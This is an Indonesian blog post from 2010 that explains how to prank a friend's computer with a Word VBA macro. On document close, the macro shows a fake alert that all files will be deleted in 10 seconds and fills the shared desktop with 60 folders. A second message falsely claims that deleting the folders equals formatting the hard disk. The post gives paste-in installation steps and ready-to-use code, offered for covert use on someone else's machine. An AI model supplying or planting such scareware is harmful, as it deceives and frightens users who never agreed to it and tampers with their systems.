Selasa, 06 April 2010

Jailin komputer orang dengan Virus Macri

Terkadang kita juga bisa kesel ya sama temen sendiri, gak usah dengan kekerasan dengan buat dia panik sedikit za itu uda bisa puas...Ok aku akan beri tau bagaimana cara menjaili komputer orang dengan virus macro di microsoft word. Caranya copy dan paste code di bawah ini pada jendela macro. caranya masuk ke Ms. Word klik tool => macro => visual basic editor lalu paste code di bawah kotak di samping yang ada kata general pada atasnya lalu save dengan nama normal atau apa lah terserah. Reaksinya jika word tersebut di tutup maka akan ada pesan bahwa komputer anda terkena virus kejam dan anda memiliki 10 detik untuk menyelamatkan data anda. Dan di desktop akan tampil sederetan folder yang memenuhi desktop. Coba dec....

Nich codenya

Private Sub Document_Close()
On Error Resume Next
MsgBox "Komputer anda terinfeksi virus ganas segera amankan dokumen anda, dalam 10 detik seluruh file akan terhapus", vbCritical, "Virus Founded"
For n = 01 To 60
MkDir "C:\Documents and Settings\All Users\Desktop\Virus Kejam" & n
Next n
MsgBox "Jika pada Desktop anda Muncul banyak Folder Jangan Dihapus, kalau dihapus sama saja dengan meformat harddisk anda", vbInformation, "Saran dari programmer"
End Sub

Selamat mencoba

Tidak ada komentar:

Posting Komentar